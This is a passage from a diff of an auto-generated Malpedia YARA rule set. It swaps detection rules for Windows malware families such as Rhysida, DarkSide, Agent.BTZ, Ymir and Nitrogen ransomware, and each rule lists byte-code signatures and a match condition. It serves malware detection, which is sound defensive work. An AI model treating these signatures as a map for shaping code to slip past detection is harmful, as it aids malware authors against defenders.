-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babylon_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.downdelph_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "2a5b12d9c48bc80c359b824ca684a979c3525be47a37762af45326a7566f7848"
+		logic_hash = "eae4c367be0b783aacccaf67139d8191ef5e286d3c53b64319eee5bb00fa728e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93401,32 +93543,32 @@ rule MALPEDIA_Win_Babylon_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4610 83c40c 8b4dfc 8b4c080c 8b45f4 3b01 7413 }
-		$sequence_1 = { ff75ec e8???????? 59 59 85ff 0f8541010000 8b0b }
-		$sequence_2 = { ff75c0 6a23 56 e8???????? 6a01 56 e8???????? }
-		$sequence_3 = { 8b450c f6402a20 753d 51 ff75f4 6a70 53 }
-		$sequence_4 = { ff3402 e8???????? 8bf0 83c404 803e9a 0f85a6000000 8b55bc }
-		$sequence_5 = { eb5e 83f8fa 7508 897e10 884601 eb51 83f8f6 }
-		$sequence_6 = { 8d4801 66894dbc 8b4620 8945a4 8b450c 8945b0 8b06 }
-		$sequence_7 = { 85f6 7e4c c7451007000000 53 8b450c 0fbe5c1001 0fbe0c10 }
-		$sequence_8 = { ff75f4 ffb57cffffff 53 56 e8???????? 83c42c 837dc000 }
-		$sequence_9 = { ffb3ac000000 e8???????? 8bbbac000000 be???????? 8b4dfc 03f9 51 }
+		$sequence_0 = { 8b0d???????? ba???????? e8???????? 8b55d4 8d45d8 }
+		$sequence_1 = { 8d45f0 e8???????? 8d45e4 33c9 ba08000000 e8???????? 8b45f4 }
+		$sequence_2 = { 8d45f4 ba02000000 e8???????? 8d45fc 8b15???????? }
+		$sequence_3 = { 7c66 46 33db 8d45c0 }
+		$sequence_4 = { 8b14b0 8d45e0 b9???????? e8???????? 8b55e0 8d45e4 e8???????? }
+		$sequence_5 = { 8d45f8 e8???????? 8b55f8 8d45fc 8b4dfc e8???????? 8bc3 }
+		$sequence_6 = { 7409 8b12 50 e8???????? 58 83e808 e8???????? }
+		$sequence_7 = { 33c9 ba04010000 e8???????? 8d45f8 }
+		$sequence_8 = { 81ce00ffffff 46 0fb68c35bcfeffff 884df7 889435bcfeffff }
+		$sequence_9 = { 8d45e4 ba03000000 e8???????? 8b55e4 8d45fc }
 
 	condition:
-		7 of them and filesize < 1604608
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Feed_Load_Auto : FILE
+rule MALPEDIA_Win_Unidentified_080_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "12c918c0-c452-5da2-b8ac-4e16f1c3b07c"
+		id = "167c06b1-3a4c-5ce4-bead-27b24b52c04c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feed_load"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.feed_load_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_080_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "722b483a312044af2fe5076c6a59554ad3a69ee6c355530da497915e66c263d4"
+		logic_hash = "1ce14bfb96c0d551ff9abc4441491b6d6b29b9deb460d6ae62dbbcd58745f42a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93440,32 +93582,32 @@ rule MALPEDIA_Win_Feed_Load_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 44393d???????? 742c 4c897c2428 4c8d0578faffff 4533c9 44897c2420 33d2 }
-		$sequence_1 = { 48ffc0 4983ef01 75ef 498d5508 488bcd 4c8d4c2458 }
-		$sequence_2 = { 448bc7 488bd0 488bce 4c8bf0 e8???????? 3bc5 7411 }
-		$sequence_3 = { 482bca 4883c302 4183e60f 4983fe0f 0f85bd000000 }
-		$sequence_4 = { e8???????? 8b442450 8905???????? eb17 4c8d442454 e8???????? }
-		$sequence_5 = { 488d15a6550200 448bcf 448bc6 ff15???????? 4423e0 0f84ef010000 488b4b18 }
-		$sequence_6 = { 4889742420 4489442418 55 57 4154 4156 4157 }
-		$sequence_7 = { 8bc2 c1e81f 03d0 8d4310 03c2 48638c24b0000000 3bc8 }
-		$sequence_8 = { e9???????? 488bc3 4c8d3d873affff 498784f798600300 4885c0 7409 }
-		$sequence_9 = { 410fb608 83e10f 4a0fbe841100050200 428a8c1110050200 }
+		$sequence_0 = { 85f6 7431 8d460d 50 e8???????? 83c404 85c0 }
+		$sequence_1 = { ff15???????? 68e8030000 ff15???????? 8b85e0fdffff 40 8985e0fdffff 83f80a }
+		$sequence_2 = { 8b5004 8bce c745ec88310210 ffd2 33c0 }
+		$sequence_3 = { 899d8cfdffff 898504fdffff 899d88fdffff 899d90fdffff 899d94fdffff }
+		$sequence_4 = { 57 56 6a01 50 ff15???????? 85c0 }
+		$sequence_5 = { 741d 8b5508 8bf3 e8???????? 83c404 5f c7830050000000000000 }
+		$sequence_6 = { 767d 03c7 3b44243c 763f 8b44243c 0500400000 50 }
+		$sequence_7 = { 894c2414 8b4760 8b5f6c 8b742414 }
+		$sequence_8 = { 40 3bc7 72f6 eb2b 8d5001 8bcf 2bca }
+		$sequence_9 = { 8b5c2414 83c3f4 81fb???????? 7414 53 ff15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 512000
+		7 of them and filesize < 392192
 }
-rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE
+rule MALPEDIA_Win_Atlantida_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d81a4891-2ccb-5a37-a1c9-3cb6dc4ddf54"
+		id = "449807de-c2d1-5bb0-a23b-6b1bb9a18e58"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nozelesn_decryptor_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlantida"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atlantida_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "df00466a0b451868376ca8f8e40a817d0c669175deb69c467a31b881c85a7c54"
+		logic_hash = "5a71a5b3ff4a38d6154af29c3b9c4fd13de9adafd3282b12a56385b9c3f01092"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93479,32 +93621,32 @@ rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1c20d 33f0 8bca 33f2 c1e103 33c8 d1c6 }
-		$sequence_1 = { 8bff 55 8bec 8b4d08 33c0 3b0cc5a8574600 7427 }
-		$sequence_2 = { 80f939 7510 c60630 8b8578ffffff 4e 3bf0 75e0 }
-		$sequence_3 = { 0f8742010000 eb14 8b7d80 83c002 8b75b4 8b8d7cffffff e9???????? }
-		$sequence_4 = { 8b450c 8b5508 8bca c745e800000000 c745ec0f000000 8b38 }
-		$sequence_5 = { 53 8b5d10 56 57 8bf9 33f6 8b07 }
-		$sequence_6 = { 89bd78ffffff 47 897d8c 813900ca9a3b 88559f 0f95c0 895588 }
-		$sequence_7 = { 8bfb 335df8 f7d7 8b4df8 0bd8 f7d1 }
-		$sequence_8 = { c745e428664200 eb08 8d4dd8 e8???????? 837e1808 }
-		$sequence_9 = { 837de800 894da0 894d90 7653 8b03 8d4dc0 51 }
+		$sequence_0 = { f7d8 33d9 03f1 c1f2eb c1b454002000f03f 668b840780fd47a1 0fb68c54002000f0 }
+		$sequence_1 = { e9???????? f7d2 66d1e8 0fca 0f81cb3a0a00 33da 59 }
+		$sequence_2 = { f6d9 d0c9 80e9b9 fec0 fec0 c1c20c 32d9 }
+		$sequence_3 = { f7da fec0 f6d0 42 6698 e8???????? 0f34 }
+		$sequence_4 = { f7d2 66898c8706fefdff 0fbeca 8b144f f6d8 0fabc0 d2c1 }
+		$sequence_5 = { ffc7 6641 d1c7 6645 0fc1d5 48 99 }
+		$sequence_6 = { ff5315 14a8 6292bfc572de 1ad7 381d???????? 50 a9dac0aaf7 }
+		$sequence_7 = { e8???????? 8b442500 ba90b9872b 80e298 8d0c55ad51af3f 8b8c55e48cf0a8 661bd2 }
+		$sequence_8 = { fec0 33d3 6633c9 2d0066b83d 35a05ea552 42 f7da }
+		$sequence_9 = { f7d8 33d8 0fca 66c1f90b 0f878f9f1200 03f0 660fa3d1 }
 
 	condition:
-		7 of them and filesize < 1122304
+		7 of them and filesize < 13793280
 }
-rule MALPEDIA_Win_Sobig_Auto : FILE
+rule MALPEDIA_Win_Guidloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f2079ef3-4c71-5dab-833c-5773ab6ef02f"
+		id = "eceb0420-babc-5550-b00f-55949b1733ed"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sobig_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.guidloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.guidloader_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "0c745bccdca469dd967ba05a41b0d6b9484e837d88e70b86ce4dd51c26e4309d"
+		logic_hash = "909d36bb63fb6009cd4cb0cf7912a67325d3ddd81af65c11026fd36fda233963"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93518,32 +93660,32 @@ rule MALPEDIA_Win_Sobig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645fc01 e8???????? 56 8d4dc8 885dfc e8???????? 834dfcff }
-		$sequence_1 = { 48 85c9 742e 53 40 57 }
-		$sequence_2 = { 50 e8???????? 83ec10 8d45b0 8bcc 8965c4 50 }
-		$sequence_3 = { 034e18 83c418 c645fc03 51 }
-		$sequence_4 = { 7ced 85f6 7e15 8bce 8d75c0 8bc1 8bfb }
-		$sequence_5 = { 8d4ddc e8???????? 85c0 0f84a0000000 68???????? 8d4ddc }
-		$sequence_6 = { 7505 b8???????? 50 8d8544fbffff 68???????? 50 ff15???????? }
-		$sequence_7 = { e8???????? e9???????? 6a10 8d45ac 6a00 50 e8???????? }
-		$sequence_8 = { 83c320 3b7e04 7cee 5b ff36 e8???????? 59 }
-		$sequence_9 = { 3b7e08 7ce6 83c8ff 5f 5e 5b c20400 }
+		$sequence_0 = { 498bd4 e8???????? 837d1000 0f8659020000 44896c2428 488d5510 4c8bcf }
+		$sequence_1 = { 4d2bc8 418b51fc d3ea 4c894808 895018 410fb609 }
+		$sequence_2 = { 83f802 7711 488b4228 49394128 418b08 0f44cf }
+		$sequence_3 = { e8???????? 4533c0 4c8d0dcd72ffff 498b5508 0fb60a 83e10f 4a0fbe840920460100 }
+		$sequence_4 = { 4c8d442448 488d1532700000 33c9 ff15???????? 488b4c2448 85c0 }
+		$sequence_5 = { 418807 4c852e 764f ba30000000 49b80000000000000f00 6666660f1f840000000000 488b06 }
+		$sequence_6 = { 4889442460 4863842420010000 4889442468 0fb6842440010000 0f298c2480000000 0f280d???????? }
+		$sequence_7 = { 898c9564010000 49c1e820 453bcd 75d6 4585c0 742e 8b8560010000 }
+		$sequence_8 = { 410f1006 0f11442430 e9???????? 488bfe 4883cf0f 483bfb 7629 }
+		$sequence_9 = { 894208 f6c310 740a 418b02 4983c204 89420c 807c243000 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 49251328
 }
-rule MALPEDIA_Win_Rhysida_Auto : FILE
+rule MALPEDIA_Win_Ymir_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "56c97e20-7a99-5fbc-90fd-a6127fd088f8"
+		id = "ec16ddc4-25ef-5b31-b796-dd562960b36b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rhysida_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ymir"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ymir_auto.yar#L1-L92"
 		license_url = "N/A"
-		logic_hash = "60516db4e2b578f830c415644222719cb56ab464473054de682480b20c1eaa3f"
+		logic_hash = "853e5b985d29c6039b89b0f82cf98458f3d83850f989fe396b592ab8b2bdf1fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93557,34 +93699,32 @@ rule MALPEDIA_Win_Rhysida_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4183c201 4883c108 4d8d3404 4889c5 4d89f4 49c1ec3c 4539d0 }
-		$sequence_1 = { 488b4510 8b4004 85c0 750a 488b4510 8b5520 895024 }
-		$sequence_2 = { f30f5e45fc f30f1145f8 488b4518 f30f1000 f30f5945f8 f30f2cc0 89c2 }
-		$sequence_3 = { 8d7802 430fb60c2a 43300c2b 448d6803 410fb62c12 450fb6043a 41302c13 }
-		$sequence_4 = { eb18 8b8598000000 898588000000 8b8594000000 898584000000 8b85b4000000 8d5001 }
-		$sequence_5 = { 41c1e818 46332483 4189e8 45332492 0fb6d4 44332491 4531e0 }
-		$sequence_6 = { 85d2 0f8f92050000 ba01000000 bd01000000 4531db 4d63cb 49beffffffffffffff0f }
-		$sequence_7 = { ffd0 c7850c11000000000000 c7850811000000000000 c7850411000000000000 c785dc0d000000000000 c785d80d000000000000 83bd4811000002 }
-		$sequence_8 = { c1e903 f348ab ff15???????? 83f812 7472 488b8b38020000 e8???????? }
-		$sequence_9 = { 4589542408 33460c 8b742444 418b2cb3 448b742458 81e5000000ff 478b1cb3 }
+		$sequence_0 = { 4c89ea 4889c1 4c0f47c3 e8???????? }
+		$sequence_1 = { 4c89ea 4889cb ff5078 488d05a7211000 }
+		$sequence_2 = { 4c89ea 4889d9 41ff14fe eb85 }
+		$sequence_3 = { 4c89ea 4889c1 4989c4 e8???????? 488d1573bf0400 31c9 }
+		$sequence_4 = { 4c89ea 4889c7 488d05ec682800 4c8d3585682800 }
+		$sequence_5 = { 4c89ea 4889c6 498b0424 c744242001000000 }
+		$sequence_6 = { 4c89ea 4889d9 488ba8d8000000 4889ac2488000000 }
+		$sequence_7 = { 4c89ea 4889c1 e8???????? 4189f2 }
 
 	condition:
-		7 of them and filesize < 2369536
+		7 of them and filesize < 5530624
 }
-rule MALPEDIA_Win_Darkside_Auto : FILE
+rule MALPEDIA_Win_Agent_Btz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aefc41a3-b8c0-5b26-a4f2-4bd0717ef6d0"
+		id = "63f52dc6-c77d-5450-96ef-d9bb7ca2e2e5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkside_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.agent_btz_auto.yar#L1-L502"
 		license_url = "N/A"
-		logic_hash = "19da14f3a366acd3b23a4b82b0e78c008b7088d377404cdf8c0d0057a334f0f7"
+		logic_hash = "490f9b875f186054dd3eafec04e94807f52eca52fbc5563b2ddd7496752d38c8"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -93596,71 +93736,120 @@ rule MALPEDIA_Win_Darkside_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 5b 5d c20800 55 8bec 53 }
-		$sequence_1 = { 895c0e04 893c0e 81ea10101010 2d10101010 81eb10101010 81ef10101010 }
-		$sequence_2 = { 75d2 5f 5e 5a 59 }
-		$sequence_3 = { 8b4508 8b10 8b5804 8b7808 8b400c 89540e0c 89440e08 }
-		$sequence_4 = { be???????? 8b4508 8b10 8b5804 8b7808 8b400c }
-		$sequence_5 = { b9f0000000 be???????? 8b4508 8b10 }
-		$sequence_6 = { e8???????? 5f 5e 5a 59 5b 5d }
-		$sequence_7 = { 85c0 7418 8bd8 68ff000000 57 }
-		$sequence_8 = { 57 e8???????? 81c7ff000000 4b 85db 75ea }
-		$sequence_9 = { 75da eb06 33db fec1 75d2 5f 5e }
+		$sequence_0 = { 51 ffd6 8d54240c 52 ffd7 }
+		$sequence_1 = { c74608ffffffff f644240801 7409 56 }
+		$sequence_2 = { 50 ffd3 85c0 75d8 5f 5e 5b }
+		$sequence_3 = { c706???????? c7460c00000000 895e08 895e04 c7461000000000 895e14 }
+		$sequence_4 = { ff15???????? b804000f00 8b4df4 64890d00000000 5f 5e 5b }
+		$sequence_5 = { 56 6a00 68???????? 8935???????? e8???????? }
+		$sequence_6 = { 6a00 50 ff15???????? 894614 33c0 }
+		$sequence_7 = { 740e 50 ff15???????? c74608ffffffff f644240801 }
+		$sequence_8 = { 8d542408 52 c744240c30000000 c744241003000000 }
+		$sequence_9 = { 8bf1 8b4608 c706???????? 85c0 7413 83f8ff 740e }
+		$sequence_10 = { 6801010000 ff15???????? 85c0 7415 }
+		$sequence_11 = { 6a0a 68???????? 6a01 6a00 68???????? }
+		$sequence_12 = { 51 6a00 6819000200 6a00 68???????? }
+		$sequence_13 = { 50 68???????? 6a01 68???????? e8???????? 83c410 }
+		$sequence_14 = { 6a01 6a04 6a01 68???????? }
+		$sequence_15 = { 50 e8???????? 83c408 6800010000 e8???????? }
+		$sequence_16 = { 6a01 68???????? e8???????? 83c414 5f 5e 5b }
+		$sequence_17 = { 89461c 3dea000000 740b 3de5030000 }
+		$sequence_18 = { 7511 e8???????? 83c020 50 }
+		$sequence_19 = { 0fb605???????? 66890d???????? 0fb60d???????? 660fafca }
+		$sequence_20 = { 83c020 50 e8???????? 83c404 33c0 }
+		$sequence_21 = { 68???????? 6a01 e8???????? 50 e8???????? 83c41c }
+		$sequence_22 = { 740d 3cff 7409 f6d0 }
+		$sequence_23 = { c684249200000065 c684249300000073 c684249400000073 c684249500000057 }
+		$sequence_24 = { 33c9 ff542458 85c0 7420 }
+		$sequence_25 = { c684248b00000061 c684248c00000074 c684248d00000065 c684248e00000050 c684248f00000072 c68424900000006f }
+		$sequence_26 = { 57 ff7508 8bf1 33db 895e10 }
+		$sequence_27 = { 6808020000 50 668945fa 8d85d8fdffff }
+		$sequence_28 = { 33ff 8d85f8f7ffff 57 50 }
+		$sequence_29 = { 6a00 6a27 6a02 6a00 6a01 }
+		$sequence_30 = { 8b85f8feffff 53 8d8df4feffff 51 8d8df8feffff }
+		$sequence_31 = { ff9574ffffff 8b4de0 89410c 33c0 8be5 5d c20400 }
+		$sequence_32 = { c684249500000057 c684249600000000 c684241001000047 c684241101000065 c684241201000074 c68424130100004c }
+		$sequence_33 = { 50 8d85e8fdffff 50 c745fc04010000 }
+		$sequence_34 = { c684248f00000072 c68424900000006f c684249100000063 c684249200000065 }
+		$sequence_35 = { 50 8945f8 33ff 8d85f8f7ffff }
+		$sequence_36 = { 8bc8 66894de0 66894de2 59 6a70 }
+		$sequence_37 = { 8d8505feffff 50 e8???????? 83c40c }
+		$sequence_38 = { c645d316 c645d43a c645d53b c645d63b c645d730 }
+		$sequence_39 = { 488b4338 33d2 488bce 448d4220 }
+		$sequence_40 = { 488b4b38 ff5160 894330 3dea000000 }
+		$sequence_41 = { 488b0e 48894628 488b4638 4c8d4c2450 448bc3 }
+		$sequence_42 = { 488b07 896830 33c0 488b5c2458 488b6c2460 488b742468 4883c440 }
+		$sequence_43 = { 488b0f 894130 eb06 488b07 896830 33c0 }
+		$sequence_44 = { 83c904 c1e803 448bc9 440fafc8 }
+		$sequence_45 = { 488b4638 488b0e 4c8d442450 4533c9 }
+		$sequence_46 = { 488b4638 ff5060 894630 3de5030000 }
+		$sequence_47 = { 488bcf c744242088130000 e8???????? 488b5738 }
+		$sequence_48 = { 488b0f 488901 488b07 488338ff }
+		$sequence_49 = { 488b0f 48894108 488b0f 488b4108 48894128 488b0f }
+		$sequence_50 = { 85db 7415 4c8b4f38 488d4804 }
+		$sequence_51 = { 8d8594faffff 50 68???????? ff15???????? }
+		$sequence_52 = { 742e f7460800000080 7405 83c60c }
+		$sequence_53 = { 72e3 8b2d???????? 8d442420 50 ffd5 }
+		$sequence_54 = { 57 33db 8d84248c000000 6a3c 53 }
+		$sequence_55 = { 85ed 7506 8b4204 8b680c b86e6b0000 66394504 0f856e010000 }
+		$sequence_56 = { 8b4604 3938 747b 8b33 57 }
+		$sequence_57 = { 5e 59 c3 68???????? e8???????? 59 b815000040 }
+		$sequence_58 = { ff74241c ffd3 837c241000 740a }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 5577728
 }
-rule MALPEDIA_Win_Rugmi_Auto : FILE
+rule MALPEDIA_Win_Unidentified_082_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "56dfd636-865d-5e6b-99e2-82ed18d11802"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rugmi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rugmi_auto.yar#L1-L132"
+		id = "7772581c-e8cf-5615-a758-46ef9c1fc0b0"
+		date = "2021-10-07"
+		modified = "2021-10-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_082_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "6414237b4a37eccf99db6de8d88a3ab9402e6945fd1a3f91716e86d56c16f3fa"
+		logic_hash = "fdfe1ddce9f77ac8b465b0ddebe868c5e77078cf2b2457573a5b3810682f45ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20211007"
+		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
+		malpedia_version = "20211008"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33db 395d08 0f94c3 8b4518 8b4d08 8908 8bc3 }
-		$sequence_1 = { 8b7704 eb14 85c0 0f8535010000 56 57 e8???????? }
-		$sequence_2 = { 3bcb 726f 8b7514 8b5d10 8bc1 0bc2 7508 }
-		$sequence_3 = { 7507 b8074c0000 c9 c3 8d45e0 50 68???????? }
-		$sequence_4 = { 894d08 8d56bc 0f45fa 68???????? 03f9 e8???????? 8b7510 }
-		$sequence_5 = { 5d c3 837d08ff 0f84b4090000 e9???????? 55 8bec }
-		$sequence_6 = { 395e3c 7520 85ff 0f841c010000 6a0a 68???????? }
-		$sequence_7 = { 88834d020000 8b84b350010000 83f8ff 7413 50 53 57 }
-		$sequence_8 = { 8955e4 c645fc00 8d4dcc e8???????? c745fcffffffff 8d8d70ffffff }
-		$sequence_9 = { 56 c687cf0c000000 68???????? e9???????? 6a02 59 6a17 }
+		$sequence_0 = { 4c8d0dbc190200 0f1f4000 0f1f840000000000 418d4801 }
+		$sequence_1 = { ff5018 4c634510 488d0df40a0200 488bd8 33c0 }
+		$sequence_2 = { 4c634510 488d0d93fa0100 488bd8 33c0 488bd3 488905???????? 488905???????? }
+		$sequence_3 = { ff15???????? 488b0cdf ff15???????? 48c704dfffffffff }
+		$sequence_4 = { 4885c0 0f84ac010000 48833d????????00 0f849e010000 48833d????????00 0f8490010000 48833d????????00 }
+		$sequence_5 = { 488b0d???????? 8b5108 488b4910 4533c9 458d4130 4c89742420 }
+		$sequence_6 = { 33c0 e9???????? 8a07 4c8b7c2448 4c8d25a64c0100 4b8b0cfc ffc3 }
+		$sequence_7 = { 0f1f4000 0f1f840000000000 418d4801 0fb6c2 41ffc0 f7da }
+		$sequence_8 = { 488b4f18 4c8d4d10 488b01 488d1587000200 41b810000000 ff5018 4c634510 }
+		$sequence_9 = { 48894598 eb03 4533f6 488b05???????? 80782e00 740a 80782000 }
 
 	condition:
-		7 of them and filesize < 950272
+		7 of them and filesize < 414720
 }
-rule MALPEDIA_Win_Avast_Disabler_Auto : FILE
+rule MALPEDIA_Win_Kingminer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "645a106b-f735-50ef-a098-7cdfe936ba27"
+		id = "dc87ee85-ad64-51c7-a30a-c6bd4d73fed8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avast_disabler_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kingminer_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "d9bf9a929cf2cb5bcebd034c783b915e751fc8d18f9e66457ed913ca7fa968a1"
+		logic_hash = "a5745ddfac302b5a6ad793ecca6fc94da98fb5fc6ae2a187ff80bbe4b8e2d2c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -93674,32 +93863,32 @@ rule MALPEDIA_Win_Avast_Disabler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d85f0feffff 50 e8???????? 8b4c371c }
-		$sequence_1 = { c20c00 3b0d???????? 7503 c20000 e9???????? 8bff }
-		$sequence_2 = { e8???????? 8b4c371c 8d85f0feffff 2b4c3718 }
-		$sequence_3 = { 8bf0 85f6 7815 8d45f8 50 e8???????? 8bf0 }
-		$sequence_4 = { 41 83ef01 75f1 8b85ecfeffff 33c9 0fb7d0 33c0 }
-		$sequence_5 = { 57 8945e4 33ff 8d45dc }
-		$sequence_6 = { 8bf0 85f6 7826 6a04 59 }
-		$sequence_7 = { 6a00 ff7508 8bf0 57 }
-		$sequence_8 = { 6bf80e 668b450c 6639443712 7408 }
-		$sequence_9 = { 6a00 ff7508 8bf0 57 e8???????? }
+		$sequence_0 = { 8945f0 c745f400000000 3b0d???????? 0f8d8e010000 68???????? ff15???????? }
+		$sequence_1 = { 8b8db0feffff e8???????? 8b95d8feffff 8b8db0feffff 52 8bf0 e8???????? }
+		$sequence_2 = { 53 8b5f38 f6c301 7570 0fb74706 }
+		$sequence_3 = { 0fb75714 8d4c3a24 85c0 7429 8bf0 }
+		$sequence_4 = { 52 e9???????? a1???????? 6800040000 }
+		$sequence_5 = { 3bf0 741e 68c1000000 ff15???????? 5b }
+		$sequence_6 = { 68???????? ff15???????? 8b7508 c7465c88d00010 }
+		$sequence_7 = { 8b0d???????? 8945ec 8b4624 83c628 }
+		$sequence_8 = { 8975e4 33c0 39b8a0f70010 0f8491000000 }
+		$sequence_9 = { 8b95d0feffff 2b4234 7419 83b9a000000000 7466 50 }
 
 	condition:
-		7 of them and filesize < 41984
+		7 of them and filesize < 165888
 }
-rule MALPEDIA_Win_Faketc_Auto : FILE
+rule MALPEDIA_Win_Nitrogen_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "20700f38-ca76-52c3-a2fd-e577561f7238"
+		id = "f1d15105-1f60-56bd-9f57-5d0889e5b371"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc"
